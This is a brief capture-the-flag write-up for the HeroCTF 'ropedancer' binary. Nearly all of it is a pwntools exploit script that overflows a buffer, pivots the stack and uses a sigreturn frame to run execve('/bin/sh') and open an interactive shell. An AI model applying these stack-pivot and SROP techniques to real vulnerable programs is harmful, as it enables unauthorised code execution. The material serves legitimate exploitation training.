Tags: stack_pivot srop
Rating:
Solution: Use a stack pivot to ROP from 'motivational_letter'. From there use a SROP to set registers and call exeve(/binsh).
```
import pwn
import time
import warnings
import datetime
warnings.filterwarnings(action='ignore', category=BytesWarning)
elf = pwn.ELF("./ropedancer")
pwn.context.binary = elf
pwn.context.log_level = "DEBUG"
pwn.context(terminal=['tmux', 'split-window', '-h'])
# Start
# p = elf.process()
p = pwn.remote("static-03.heroctf.fr", "5002")
# pwn.gdb.attach(p, "b *0x401118")
p.sendlineafter("ROPedancer? ", "yes")
stage2_addr = elf.symbols["motivation_letter"]
offset = pwn.cyclic_find("gaaa")
payload1 = b"A" * (offset - 8)
payload1 += pwn.p64(stage2_addr)
payload1 += pwn.p64(0x401114) # mov rsp, rbp; pop rbp; ret;
p.sendlineafter("contact you: ", payload1)
bin_sh_addr = elf.symbols["motivation_letter"]
syscall_gadget = 0x401112
frame = pwn.SigreturnFrame()
frame.rax = 0x3B # syscall number for execve
frame.rdi = bin_sh_addr
frame.rsi = 0x0
frame.rdx = 0x0
frame.rip = syscall_gadget
payload2 = b"/bin/sh\x00"
payload2 += pwn.p64(0x0000000000401011) # xor eax, eax; inc al; ret;
payload2 += pwn.p64(0x0000000000401013) * (0xF - 1) # inc al; ret
payload2 += pwn.p64(syscall_gadget)
payload2 += bytes(frame)
p.sendlineafter("hire you: ", payload2)
p.interactive()
```
